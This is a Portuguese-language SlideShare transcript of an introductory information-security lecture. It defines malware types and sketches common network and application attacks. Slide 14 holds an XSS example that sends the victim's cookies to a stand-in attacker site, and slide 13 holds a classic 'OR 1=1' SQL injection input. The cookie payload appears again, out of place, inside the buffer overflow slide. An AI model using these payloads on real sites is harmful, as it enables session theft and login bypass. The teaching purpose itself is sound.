Unidade 2 malwares e ataques

525 visualizações

Publicada em

0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
525
No SlideShare
0
A partir de incorporações
0
Número de incorporações
2
Ações
Compartilhamentos
0
Downloads
40
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Unidade 2 malwares e ataques

  1. 1. Técnico de Manutenção e Suporte em InformáticaDisciplina - Segurança da InformaçãoUnidade 2 – Malwares e Ataques mais comuns Prof. Leandro Cavalcanti de Almeida lcavalcanti.almeida@gmail.com @leandrocalmeida
  2. 2. Malwares
  3. 3. Malwares = Software Maliciosos Cavalo Vírus Bot Backdoors de Tróia Worms Rootkits Spywares Keylogger
  4. 4. VírusTrecho de código, geralmente em assembler, queé injetado dentro de outro aplicativoModo de Operação: necessidade de um códigohospedeiro para sobreviver e replicar. Necessitada ação do usuário Vírus
  5. 5. KeyloggerAplicativo voltado para capturar tudo o que se édigitado no tecladoModo de Operação: aplicativo captura tudo que édigitado e envia de tempos em tempos para oatacante Keylogger
  6. 6. WormAplicativo que realiza escaneamentos na rede embusca de hosts vulneráveis. Não necessita da açãodo usuárioModo de Operação: Se instala e replica entrehosts na rede de forma cíclica Worms
  7. 7. BotRobô, que possui funcionalidades de worms, e ficaaguardando a ordem do seu mestre para realizarataques a outros computadoresModo de Operação: Após o comando do mestrerealiza um DoS em algum outro host na rede Bot
  8. 8. RootKitAplicativo que têm como finalidade permitiracesso privilegiado a um invasor, escondendoseus rastrosModo de Operação: Geralmente se camufla emoutros processos do sistema e abre umabackdoor para acessos remotos nãoautorizados Rootkits
  9. 9. BackdoorAplicativo que têm como finalidade permitiracesso remoto através da abertura não autorizadade uma portaModo de Operação: Geralmente habilitam umaporta alta para acessos não autorizados Backdoors
  10. 10. SpywaresAplicativo que têm como finalidade coletarinformações estatísticas dos hosts e enviá-las aoatacanteModo de Operação: Monitoram processos econexões de rede e enviam essasinformações so atacante Spywares
  11. 11. Cavalo de TróiaPresente de grego camuflado em arquivos comofotos, cartões virtuas, jogos,... que tem funçõesdestrutivasModo de Operação: após a vítima baixar o“presente” o trojan instala outro Malware Cavalo de Tróia
  12. 12. AtaquesAplicação Sql Injection XSS Buffer OverflowTransporte TCP SYN FLOOD UDP FLOOD Main in the Middle Rede IP Spoofing ICMP Flooding STP Attack Enlace ARP Spoofing ARP Poisoning Físico MAC Spoofing
  13. 13. SQL Injection Ex : Sistema de autenticação em PHPImagine se o usuário inserir os dados abaixo...Login: qualquer coisaSenha: OR 1=1SELECT * FROM usuarios WHERE login=qualquer coisa AND senha = OR 1=1 Essa query SQL retornará todos os registros da tabela usuários!
  14. 14. XSSSuposição:Facebook vulnerável a Cross-Site Scripting Usuário ingênuo clica no link... <script> Document.location = http://sitedocracker.com/roubarcokkies.php= + document.cookie </script>Insere um código(html, Javascript,...) malicioso no lugar de um post nabase de dados do facebook
  15. 15. Buffer Overflowchar nome[4]; int idade; L E O 0 2 0Entrada: LEO idade: 20char nome[4]; int idade; L E O O A 0 <script> Document.location = http://sitedocracker.com/roubarcokkies.php= + document.cookie </script>Entrada: LEOOA idade: 65
  16. 16. TCP SYN FLOOD SYN SYN-ACK ACK SYN SYN SYN SYN SYN SYN
  17. 17. UDP FLOOD UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer
  18. 18. Main in the Middle Packet Packet Packet Packet
  19. 19. IP Spoofing Packet Packet10.0.0.1 Packet Packet 10.0.0.254 Packet Packet Atacante envia pacotes IP falsificados para a vítima, se passando por outro host na10.0.0.1 rede!
  20. 20. ICMP Flooding ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request
  21. 21. Spanning Tree Attack Packet Packet VLAN 2VLAN 1 PacketPacket Packet Packet Packet Packet Packet Atacante se torna Root bridge Packet Packet VLAN 1 Packet Packet VLAN 1 VLAN 3 VLAN 1 VLAN 2 VLAN 2
  22. 22. ARP Spoofing Packet PacketIP: 10.0.0.1MAC: Packet68:A3:C4:9B:73:54 IP: 10.0.0.254 Packet MAC: 52:54:00:69:42:4A arpspoof Packet Packet Atacante envia pacotes ARP falsificadosIP: 10.0.0.2 para a vítima, se passando por outro hostMAC: na rede!68:A3:C4:9B:73:54
  23. 23. ARP PoisoningIP: 10.0.0.1MAC:68:A3:C4:9B:73:54 1 MAC IP: 10.0.0.254 2 MAC MAC: 52:54:00:69:42:4A Packet 3 MAC 4 MAC 5 MAC 6 MAC Atacante envenena a tabela ARP do SwitchIP: 10.0.0.2MAC: 68:A3:C4:9B:73:54
  24. 24. MAC Spoofing Packet Packet68:A3:C4:9B:73:54 Packet 52:54:00:69:42:4A Packet Packet Atacante envia pacotes com endereço MAC falsificado para a vítima, se passando por68:A3:C4:9B:73:54 outro host na rede!

×